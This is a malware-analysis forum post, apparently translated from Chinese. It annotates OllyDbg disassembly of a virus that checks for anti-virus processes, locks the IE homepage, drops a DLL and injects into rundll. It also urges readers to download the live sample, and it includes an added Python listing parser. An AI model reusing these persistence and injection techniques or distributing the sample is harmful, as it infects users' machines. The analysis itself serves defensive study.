I got this virus sample two days ago. I just ran it through online scanning, and none of the domestic anti-virus products have a signature for it yet. If you see this post, feel free to download it and check whether your anti-virus can detect it! Thanks to the person who knocked me down yesterday (myself): I stayed up until 12 last night writing this article, to build up my confidence. Since it is a brand-new virus I am posting it now; download it a little later and it will already have been added to the anti-virus signature databases. My QQ: 591841426 (for study and exchange only; people looking for cracks, please don't bother me).
Enough idle talk! Let's begin.
The sample is unpacked, 256,144 bytes long, and written in VC++.
MD5: F5E39FD21E72F15A966F90AA35725B87
1. First, let's look at the virus body
Code:
00401660 >/$ 55 PUSH EBP // the debugger stops here on load (entry point)
00401661 |. 8BEC MOV EBP,ESP
00401663 |. 6A FF PUSH -1
00401665 |. 68 A8524000 PUSH 复件_123.004052A8
0040166A |. 68 5A164000 PUSH <JMP.&MSVCRT._except_handler3> ; SE handler installation
0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00401675 |. 50 PUSH EAX
00401676 |. 64:8925 00000>MOV DWORD PTR FS:[0],ESP
0040167D |. 83EC 68 SUB ESP,68
00401680 |. 53 PUSH EBX
00401681 |. 56 PUSH ESI
00401682 |. 57 PUSH EDI
00401683 |. 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP
00401686 |. 33DB XOR EBX,EBX
00401688 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX
0040168B |. 6A 02 PUSH 2
0040168D |. FF15 50514000 CALL DWORD PTR DS:[<&MSVCRT.__set_app_ty>; msvcrt.__set_app_type
00401693 |. 59 POP ECX
00401694 |. 830D 10E64300>OR DWORD PTR DS:[43E610],FFFFFFFF
0040169B |. 830D 14E64300>OR DWORD PTR DS:[43E614],FFFFFFFF
004016A2 |. FF15 54514000 CALL DWORD PTR DS:[<&MSVCRT.__p__fmode>] ; msvcrt.__p__fmode
004016A8 |. 8B0D 04E64300 MOV ECX,DWORD PTR DS:[43E604]
004016AE |. 8908 MOV DWORD PTR DS:[EAX],ECX
004016B0 |. FF15 58514000 CALL DWORD PTR DS:[<&MSVCRT.__p__commode>; msvcrt.__p__commode
004016B6 |. 8B0D 00E64300 MOV ECX,DWORD PTR DS:[43E600]
004016BC |. 8908 MOV DWORD PTR DS:[EAX],ECX
004016BE |. A1 5C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._adjust_f>
004016C3 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
004016C5 |. A3 0CE64300 MOV DWORD PTR DS:[43E60C],EAX
004016CA |. E8 16010000 CALL 复件_123.004017E5
004016CF |. 391D 10E44300 CMP DWORD PTR DS:[43E410],EBX
004016D5 |. 75 0C JNZ SHORT 复件_123.004016E3
004016D7 |. 68 E2174000 PUSH 复件_123.004017E2
004016DC |. FF15 60514000 CALL DWORD PTR DS:[<&MSVCRT.__setusermat>; msvcrt.__setusermatherr
004016E2 |. 59 POP ECX
004016E3 |> E8 E8000000 CALL 复件_123.004017D0
004016E8 |. 68 1C604000 PUSH 复件_123.0040601C
004016ED |. 68 18604000 PUSH 复件_123.00406018
004016F2 |. E8 D3000000 CALL <JMP.&MSVCRT._initterm>
004016F7 |. A1 FCE54300 MOV EAX,DWORD PTR DS:[43E5FC]
004016FC |. 8945 94 MOV DWORD PTR SS:[EBP-6C],EAX
004016FF |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00401702 |. 50 PUSH EAX
00401703 |. FF35 F8E54300 PUSH DWORD PTR DS:[43E5F8]
00401709 |. 8D45 9C LEA EAX,DWORD PTR SS:[EBP-64]
0040170C |. 50 PUSH EAX
0040170D |. 8D45 90 LEA EAX,DWORD PTR SS:[EBP-70]
00401710 |. 50 PUSH EAX
00401711 |. 8D45 A0 LEA EAX,DWORD PTR SS:[EBP-60]
00401714 |. 50 PUSH EAX
00401715 |. FF15 68514000 CALL DWORD PTR DS:[<&MSVCRT.__getmainarg>; msvcrt.__getmainargs
0040171B |. 68 14604000 PUSH 复件_123.00406014
00401720 |. 68 00604000 PUSH 复件_123.00406000
00401725 |. E8 A0000000 CALL <JMP.&MSVCRT._initterm>
0040172A |. 83C4 24 ADD ESP,24
0040172D |. A1 6C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._acmdln>]
00401732 |. 8B30 MOV ESI,DWORD PTR DS:[EAX]
00401734 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI
00401737 |. 803E 22 CMP BYTE PTR DS:[ESI],22
0040173A |. 75 3A JNZ SHORT 复件_123.00401776
0040173C |> 46 /INC ESI // from here on it obtains its own path
0040173D |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI
00401740 |. 8A06 |MOV AL,BYTE PTR DS:[ESI]
00401742 |. 3AC3 |CMP AL,BL
00401744 |. 74 04 |JE SHORT 复件_123.0040174A
00401746 |. 3C 22 |CMP AL,22
00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C // loop ends here
0040174A |> 803E 22 CMP BYTE PTR DS:[ESI],22
0040174D |. 75 04 JNZ SHORT 复件_123.00401753
0040174F |> 46 INC ESI
00401750 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI
00401753 |> 8A06 MOV AL,BYTE PTR DS:[ESI]
00401755 |. 3AC3 CMP AL,BL
00401757 |. 74 04 JE SHORT 复件_123.0040175D
00401759 |. 3C 20 CMP AL,20
0040175B |.^ 76 F2 JBE SHORT 复件_123.0040174F
0040175D |> 895D D0 MOV DWORD PTR SS:[EBP-30],EBX
00401760 |. 8D45 A4 LEA EAX,DWORD PTR SS:[EBP-5C]
00401763 |. 50 PUSH EAX ; /pStartupinfo
00401764 |. FF15 48504000 CALL DWORD PTR DS:[<&KERNEL32.GetStartup>; \GetStartupInfoA
0040176A |. F645 D0 01 TEST BYTE PTR SS:[EBP-30],1
0040176E |. 74 11 JE SHORT 复件_123.00401781
00401770 |. 0FB745 D4 MOVZX EAX,WORD PTR SS:[EBP-2C]
00401774 |. EB 0E JMP SHORT 复件_123.00401784
00401776 |> 803E 20 /CMP BYTE PTR DS:[ESI],20
00401779 |.^ 76 D8 |JBE SHORT 复件_123.00401753
0040177B |. 46 |INC ESI
0040177C |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI
0040177F |.^ EB F5 \JMP SHORT 复件_123.00401776
00401781 |> 6A 0A PUSH 0A
00401783 |. 58 POP EAX
00401784 |> 50 PUSH EAX
00401785 |. 56 PUSH ESI
00401786 |. 53 PUSH EBX
00401787 |. 53 PUSH EBX ; /pModule
00401788 |. FF15 44504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
0040178E |. 50 PUSH EAX
0040178F |. E8 6A000000 CALL 复件_123.004017FE // the program's main CALL
00401794 |. 8945 98 MOV DWORD PTR SS:[EBP-68],EAX
00401797 |. 50 PUSH EAX ; /status
00401798 |. FF15 70514000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit
0040179E |. 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
004017A1 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004017A3 |. 8B09 MOV ECX,DWORD PTR DS:[ECX]
004017A5 |. 894D 88 MOV DWORD PTR SS:[EBP-78],ECX
004017A8 |. 50 PUSH EAX
004017A9 |. 51 PUSH ECX
004017AA |. E8 15000000 CALL <JMP.&MSVCRT._XcptFilter>
004017AF |. 59 POP ECX
004017B0 |. 59 POP ECX
004017B1 \. C3 RETN
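Every listing in this post arrived flattened onto a few long lines, so before reading them it helps to have a tool that restores one instruction per line and pulls out the parts an analyst cares about. The script below is an added example, not code from the original post: it splits a flattened OllyDbg dump on the address/flag-column boundary, parses each entry into address, opcode bytes, instruction, OllyDbg's own "; comment" and the analyst's "// annotation", and then collects the referenced ASCII strings, the resolved API names of CALLs, and the annotations. The sample input embedded in it is constructed from fragments of this post's listings; the regular expressions are this example's own assumptions about the OllyDbg layout seen here (truncated byte columns ending in ">", loop-bracket glyphs "/ | \" before mnemonics).

```python
import re

# Constructed sample: fragments of this post's listings run together on one line,
# the way the forum export flattened them (not a listing copied verbatim).
FLATTENED = " ".join([
    r'00403627 |. 68 48E14300 PUSH 复件_123.0043E148 ; ASCII "SOFTWARE\Softfy\LockPage"',
    r'0040362C |. 56 PUSH ESI',
    r'00403630 |. E8 62DBFFFF CALL 复件_123.00401197 //create registry key',
    r'004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA',
    r'00404021 |. E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot //take process snapshot',
    r'00404265 |. 68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn"',
    r'0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]',
    r'0040172A |. 83C4 24 ADD ESP,24',
    r'0040427B |. 68 00000080 PUSH 80000000',
    r'00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C //loop ends here',
    r'004017B1 \. C3 RETN',
])

# An entry starts with an 8-hex-digit address followed by OllyDbg's flag column
# ("|.", "|>", "\.", ">/$", "|.^" ...). The lookbehind rejects addresses used as
# operands ("复件_123.00401197"); opcode bytes such as "48E14300 PUSH" fail the
# flag-column test, so neither starts a new entry.
INSN_START = re.compile(r"(?<![.\w])(?=[0-9A-F]{8}\s+[>/|\\.$^]+\s)")

# address, flag column, opcode bytes (hex pairs, optional "64:" segment prefix,
# or a truncated run ending in ">"), then the instruction text.
ENTRY_RE = re.compile(
    r"^(?P<addr>[0-9A-F]{8})\s+(?P<flag>\S+)\s+"
    r"(?P<bytes>(?:(?:[0-9A-F]{2}:)?(?:[0-9A-F]{2}){1,6}\s+|[0-9A-F]+>)+)"
    r"(?P<rest>.*)$"
)
STRING_RE = re.compile(r'"(.*)"')                   # ASCII "..."  /  /src = "..."
API_RE = re.compile(r"<(?:JMP\.)?&\w+\.(\w+)")       # <JMP.&MOD.Func>  /  <&MOD.Func
MOD_FUNC_RE = re.compile(r"^\w+\.(\w+)$")            # "; kernel32.Sleep"


def split_listing(text):
    """Break a flattened OllyDbg dump into one instruction per entry."""
    starts = [m.start() for m in INSN_START.finditer(text)]
    chunks = [text[a:b] for a, b in zip(starts, starts[1:] + [len(text)])]
    return [c.strip() for c in chunks if c.strip()]


def parse_entry(entry):
    """Parse one instruction line into its columns; None if it is not one."""
    m = ENTRY_RE.match(entry)
    if not m:
        return None
    # The analyst's "//" annotation always follows whitespace; "http://" does not.
    rest, *note = re.split(r"\s//", m.group("rest"), maxsplit=1)
    instr, _, comment = rest.partition(";")      # OllyDbg's own "; comment"
    return {
        "addr": m.group("addr"),
        "bytes": m.group("bytes").split(),
        "instr": instr.strip().lstrip("/|\\"),     # drop loop-bracket glyphs
        "comment": comment.strip(),
        "note": note[0].strip() if note else "",
    }


def api_name(entry):
    """API a CALL targets, preferring OllyDbg's full "\\Name" comment over the
    (often truncated) import thunk in the operand."""
    if not entry["instr"].startswith("CALL"):
        return None
    comment = entry["comment"]
    if comment.startswith("\\"):
        return comment[1:].split()[0]
    m = MOD_FUNC_RE.match(comment) or API_RE.search(entry["instr"])
    return m.group(1) if m else None


def summarize(text):
    """Referenced strings, resolved API calls and analyst notes, in listing order."""
    entries = [e for e in map(parse_entry, split_listing(text)) if e]
    strings, apis, notes = [], [], []
    for e in entries:
        s = STRING_RE.search(e["comment"])
        if s:
            strings.append(s.group(1))
        a = api_name(e)
        if a:
            apis.append(a)
        if e["note"]:
            notes.append((e["addr"], e["note"]))
    return {"count": len(entries), "strings": strings, "apis": apis, "notes": notes}


if __name__ == "__main__":
    print("\n".join(split_listing(FLATTENED)))
    print(summarize(FLATTENED))
```

Run on the constructed sample, `split_listing` yields eleven entries and `summarize` reports the two strings ("SOFTWARE\Softfy\LockPage" and the URL), the two resolved APIs (RegCreateKeyExA, CreateToolhelp32Snapshot) and the three annotations. Feeding it a whole flattened function from this post gives the string and import inventory of that function in one pass.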
Code:
0040443F . B8 5C194000 MOV EAX,复件_123.0040195C
00404444 . E8 A7D1FFFF CALL 复件_123.004015F0
00404449 . 51 PUSH ECX
0040444A . 56 PUSH ESI
0040444B . 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
0040444E . 57 PUSH EDI
0040444F . 50 PUSH EAX
00404450 . E8 93CEFFFF CALL 复件_123.004012E8
00404455 . 59 POP ECX
00404456 . 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
0040445A . 50 PUSH EAX
0040445B . B9 E4E54300 MOV ECX,复件_123.0043E5E4
00404460 . E8 43D1FFFF CALL <JMP.&MFC42.#858_??4CString@@QAEABV>
00404465 . 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00404469 . 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
0040446C . E8 3BD0FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404471 . E8 8AEBFFFF CALL 复件_123.00403000 // create registry entries
00404476 . E8 E4EFFFFF CALL 复件_123.0040345F // create registry entries
0040447B . 8B35 54504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
00404481 . BF C8000000 MOV EDI,0C8
00404486 . 57 PUSH EDI ; /Timeout => 200. ms
00404487 . FFD6 CALL ESI ; \Sleep // sleep 200 ms
00404489 . E8 72FBFFFF CALL 复件_123.00404000 // enumerate processes looking for ravmond.exe
0040448E . 85C0 TEST EAX,EAX
00404490 . 74 0C JE SHORT 复件_123.0040449E
00404492 . E8 1CFEFFFF CALL 复件_123.004042B3
00404497 . E8 75FEFFFF CALL 复件_123.00404311
0040449C . EB 0E JMP SHORT 复件_123.004044AC
0040449E > E8 E6FEFFFF CALL 复件_123.00404389 // enumerate processes looking for 360tray.exe
004044A3 . 85C0 TEST EAX,EAX
004044A5 . 75 05 JNZ SHORT 复件_123.004044AC
004044A7 . E8 2EFDFFFF CALL 复件_123.004041DA // locate IEXPLORE.EXE and lock the homepage to http://www.rom12580.cn
004044AC > 57 PUSH EDI
004044AD . FFD6 CALL ESI
004044AF . E8 16ECFFFF CALL 复件_123.004030CA // begin dropping files
004044B4 . E8 58EDFFFF CALL 复件_123.00403211 // create directory and drop files
004044B9 . A3 ECE54300 MOV DWORD PTR DS:[43E5EC],EAX
004044BE . E8 EEEEFFFF CALL 复件_123.004033B1 // drop iksii.dll
004044C3 . 57 PUSH EDI
004044C4 . FFD6 CALL ESI
004044C6 . E8 D6EDFFFF CALL 复件_123.004032A1 // inject into the rundll.exe process and run it
004044CB . BF E8030000 MOV EDI,3E8
004044D0 . 57 PUSH EDI
004044D1 . FFD6 CALL ESI
004044D3 . E8 9FCBFFFF CALL 复件_123.00401077 // drop the virus body
004044D8 . 57 PUSH EDI
004044D9 . FFD6 CALL ESI
004044DB . E8 C4FBFFFF CALL 复件_123.004040A4
004044E0 . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004044E3 . 5F POP EDI
004044E4 . 33C0 XOR EAX,EAX
004044E6 . 5E POP ESI
004044E7 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004044EE . C9 LEAVE
004044EF . C3 RETN
Code:
0040141D /$ B8 8C184000 MOV EAX,复件_123.0040188C
00401422 |. E8 C9010000 CALL 复件_123.004015F0
00401427 |. 83EC 0C SUB ESP,0C
0040142A |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
0040142E |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401431 |. E8 C7FCFFFF CALL 复件_123.004010FD
00401436 |. 68 60E04300 PUSH 复件_123.0043E060 ; ASCII "SOFTWARE\Softfy\PlugName"
0040143B |. 68 02000080 PUSH 80000002
00401440 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401443 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
00401447 |. E8 4BFDFFFF CALL 复件_123.00401197 // create registry key
0040144C |. 85C0 TEST EAX,EAX
0040144E |. 75 20 JNZ SHORT 复件_123.00401470
00401450 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401453 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401456 |. 68 54E04300 PUSH 复件_123.0043E054 ; ASCII "LogonName"
0040145B |. E8 BB0B0000 CALL 复件_123.0040201B // set the LogonName value
00401460 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401463 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401466 |. 68 44E04300 PUSH 复件_123.0043E044 ; ASCII "LogonMainName"
0040146B |. E8 AB0B0000 CALL 复件_123.0040201B // set the LogonMainName value
00401470 |> 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401473 |. E8 55FDFFFF CALL 复件_123.004011CD // close the key
00401478 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
0040147C |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
0040147F |. E8 AEFCFFFF CALL 复件_123.00401132
00401484 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00401488 |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
0040148B |. E8 1C000000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00401490 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00401493 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
0040149A |. C9 LEAVE
0040149B \. C3 RETN
Code:
00401197 /$ 55 PUSH EBP
00401198 |. 8BEC MOV EBP,ESP
0040119A |. 51 PUSH ECX
0040119B |. 56 PUSH ESI ; 复件_123.0043E5E8
0040119C |. 8BF1 MOV ESI,ECX
0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004011AC |. 83C6 04 ADD ESI,4
004011AF |. 50 PUSH EAX ; /pDisposition
004011B0 |. 33C0 XOR EAX,EAX ; |
004011B2 |. 56 PUSH ESI ; |pHandle
004011B3 |. 50 PUSH EAX ; |pSecurity => NULL
004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA |. 50 PUSH EAX ; |Class => NULL
004011BB |. 50 PUSH EAX ; |Reserved => 0
004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey
004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey
004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8 |. 5E POP ESI
004011C9 |. C9 LEAVE
004011CA \. C2 0800 RETN 8
Code:
0040345F /$ B8 F8184000 MOV EAX,复件_123.004018F8
00403464 |. E8 87E1FFFF CALL 复件_123.004015F0
00403469 |. 83EC 30 SUB ESP,30
0040346C |. 53 PUSH EBX
0040346D |. 56 PUSH ESI
0040346E |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C]
00403471 |. E8 4AE1FFFF CALL <JMP.&MFC42.#354_??0CFile@@QAE@XZ>
00403476 |. 33DB XOR EBX,EBX
00403478 |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20]
0040347B |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX
0040347E |. E8 1DE0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00403483 |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
00403486 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
0040348A |. E8 11E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040348F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00403492 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00403496 |. E8 05E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040349B |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
0040349E |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
004034A2 |. E8 F9DFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034A7 |. 68 6CE24300 PUSH 复件_123.0043E26C ; ASCII "full80"
004034AC |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
004034AF |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4
004034B3 |. E8 FADFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034B8 |. 68 68E24300 PUSH 复件_123.0043E268 ; ASCII "C2"
004034BD |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004034C0 |. E8 EDDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034C5 |. 68 60E24300 PUSH 复件_123.0043E260 ; ASCII "1.0.1"
004034CA |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
004034CD |. E8 E0DFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034D2 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004034D5 |. E8 23DCFFFF CALL 复件_123.004010FD
004034DA |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034DD |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5
004034E1 |. E8 BADFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034E6 |. 68 44E24300 PUSH 复件_123.0043E244 ; ASCII " SOFTWARE\Softfy\Plug"
004034EB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034EE |. C645 FC 06 MOV BYTE PTR SS:[EBP-4],6
004034F2 |. E8 BBDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034F7 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034FA |. E8 BBE0FFFF CALL <JMP.&MFC42.#6282_?TrimLeft@CString>
004034FF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00403502 |. E8 ADE0FFFF CALL <JMP.&MFC42.#6283_?TrimRight@CStrin>
00403507 |. FF75 F0 PUSH DWORD PTR SS:[EBP-10]
0040350A |. BE 02000080 MOV ESI,80000002
0040350F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403512 |. 56 PUSH ESI
00403513 |. E8 7FDCFFFF CALL 复件_123.00401197 // create registry key
00403518 |. 85C0 TEST EAX,EAX
0040351A |. 75 7B JNZ SHORT 复件_123.00403597
0040351C |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C]
0040351F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403522 |. 68 34E24300 PUSH 复件_123.0043E234 ; ASCII "PlugUserName"
00403527 |. E8 EFEAFFFF CALL 复件_123.0040201B // set registry value
0040352C |. FF75 E8 PUSH DWORD PTR SS:[EBP-18]
0040352F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403532 |. 68 24E24300 PUSH 复件_123.0043E224 ; ASCII "PlugSoftName"
00403537 |. E8 DFEAFFFF CALL 复件_123.0040201B // set registry value
0040353C |. FF75 EC PUSH DWORD PTR SS:[EBP-14]
0040353F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403542 |. 68 18E24300 PUSH 复件_123.0043E218 ; ASCII "PlugSoftVer"
00403547 |. E8 CFEAFFFF CALL 复件_123.0040201B // set registry value
0040354C |. 53 PUSH EBX
0040354D |. 68 0CE24300 PUSH 复件_123.0043E20C ; ASCII "PlugSendNum"
00403552 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403555 |. E8 A6EAFFFF CALL 复件_123.00402000 // set registry value
0040355A |. 53 PUSH EBX
0040355B |. 68 00E24300 PUSH 复件_123.0043E200 ; ASCII "PlugStat"
00403560 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403563 |. E8 98EAFFFF CALL 复件_123.00402000 // set registry value
00403568 |. 68 F8E14300 PUSH 复件_123.0043E1F8 ; ASCII "3.6.7"
0040356D |. 68 ECE14300 PUSH 复件_123.0043E1EC ; ASCII "PlugUpdate"
00403572 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403575 |. E8 A1EAFFFF CALL 复件_123.0040201B // set registry value
0040357A |. 6A 01 PUSH 1
0040357C |. 68 E4E14300 PUSH 复件_123.0043E1E4 ; ASCII "CoreDll"
00403581 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403584 |. E8 77EAFFFF CALL 复件_123.00402000 // set registry value
00403589 |. 53 PUSH EBX
0040358A |. 68 D8E14300 PUSH 复件_123.0043E1D8 ; ASCII "LoadNums"
0040358F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403592 |. E8 69EAFFFF CALL 复件_123.00402000 // set registry value
00403597 |> 57 PUSH EDI
00403598 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040359B |. E8 2DDCFFFF CALL 复件_123.004011CD // close registry key
004035A0 |. 68 BCE14300 PUSH 复件_123.0043E1BC ; ASCII "SOFTWARE\Softfy\PlugDown"
004035A5 |. 56 PUSH ESI
004035A6 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035A9 |. E8 E9DBFFFF CALL 复件_123.00401197 // everything below just creates registry keys and values; no need to go into detail
004035AE |. 85C0 TEST EAX,EAX
004035B0 |. BF B4E14300 MOV EDI,复件_123.0043E1B4 ; ASCII "1.0.0"
004035B5 |. 75 1C JNZ SHORT 复件_123.004035D3
004035B7 |. 57 PUSH EDI
004035B8 |. 68 ACE14300 PUSH 复件_123.0043E1AC ; ASCII "PlugOne"
004035BD |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035C0 |. E8 56EAFFFF CALL 复件_123.0040201B
004035C5 |. 57 PUSH EDI
004035C6 |. 68 A4E14300 PUSH 复件_123.0043E1A4 ; ASCII "PlugTwo"
004035CB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035CE |. E8 48EAFFFF CALL 复件_123.0040201B
004035D3 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035D6 |. E8 F2DBFFFF CALL 复件_123.004011CD
004035DB |. 68 8CE14300 PUSH 复件_123.0043E18C ; ASCII "SOFTWARE\Softfy\WebIni"
004035E0 |. 56 PUSH ESI
004035E1 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035E4 |. E8 AEDBFFFF CALL 复件_123.00401197
004035E9 |. 85C0 TEST EAX,EAX
004035EB |. 75 32 JNZ SHORT 复件_123.0040361F
004035ED |. 57 PUSH EDI
004035EE |. 68 80E14300 PUSH 复件_123.0043E180 ; ASCII "WebIniVer"
004035F3 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035F6 |. E8 20EAFFFF CALL 复件_123.0040201B
004035FB |. E8 10010000 CALL 复件_123.00403710
00403600 |. 0FB7C0 MOVZX EAX,AX
00403603 |. 50 PUSH EAX
00403604 |. 68 70E14300 PUSH 复件_123.0043E170 ; ASCII "WebIniSection"
00403609 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040360C |. E8 EFE9FFFF CALL 复件_123.00402000
00403611 |. 53 PUSH EBX
00403612 |. 68 64E14300 PUSH 复件_123.0043E164 ; ASCII "HitProbaby"
00403617 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040361A |. E8 E1E9FFFF CALL 复件_123.00402000
0040361F |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403622 |. E8 A6DBFFFF CALL 复件_123.004011CD
00403627 |. 68 48E14300 PUSH 复件_123.0043E148 ; ASCII "SOFTWARE\Softfy\LockPage"
0040362C |. 56 PUSH ESI
0040362D |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403630 |. E8 62DBFFFF CALL 复件_123.00401197
00403635 |. 85C0 TEST EAX,EAX
00403637 |. 5F POP EDI
00403638 |. 75 1C JNZ SHORT 复件_123.00403656
0040363A |. 53 PUSH EBX
0040363B |. 68 3CE14300 PUSH 复件_123.0043E13C ; ASCII "LockPageNum" // registry value
00403640 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403643 |. E8 B8E9FFFF CALL 复件_123.00402000
00403648 |. 53 PUSH EBX
00403649 |. 68 2CE14300 PUSH 复件_123.0043E12C ; ASCII "NeedLockPage" // registry value
0040364E |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403651 |. E8 AAE9FFFF CALL 复件_123.00402000
00403656 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403659 |. E8 6FDBFFFF CALL 复件_123.004011CD
0040365E |. 68 14E14300 PUSH 复件_123.0043E114 ; ASCII "SOFTWARE\Softfy\CSID" // registry key
00403663 |. 56 PUSH ESI
00403664 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403667 |. E8 2BDBFFFF CALL 复件_123.00401197
0040366C |. 85C0 TEST EAX,EAX
0040366E |. 75 37 JNZ SHORT 复件_123.004036A7
00403670 |. 68 ECE04300 PUSH 复件_123.0043E0EC ; ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"
00403675 |. 68 E4E04300 PUSH 复件_123.0043E0E4 ; ASCII "csid"
0040367A |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040367D |. E8 99E9FFFF CALL 复件_123.0040201B // create the csid registry value, locking the homepage
00403682 |. FF35 E4E54300 PUSH DWORD PTR DS:[43E5E4]
